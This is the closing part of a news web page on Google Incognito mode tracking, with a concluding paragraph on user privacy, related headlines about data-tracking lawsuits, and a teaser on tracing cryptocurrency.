
The onus lies on users to stay informed, to demand accountability, and to push for technological solutions that respect our right to digital discretion. Only then can the internet become a space where “incognito” truly means unseen, unheard, and ultimately, free?

****_RELATED ARTICLES_****

1.  **$4 billion lawsuit claim Google tracked iPhone users’ activity**
2.  **Google Facing Lawsuit Over Tracking Users in Incognito Mode**
3.  **Microsoft sued for alleged misuse of stolen Dark Web credentials**
4.  **Dutch Watchdog Sues Adobe Over Mass Collection of Citizen Data**
5.  **DuckDuckGo study claims Google Incognito searches are not private**

Google Incognito Mode: New Disclaimer Reveals Data Tracking

Once, drug dealers and money launderers saw cryptocurrency as perfectly untraceable. Then a grad student named Sarah Meiklejohn proved them all wrong—and set the stage for a decade-long crackdown.

Tag

#google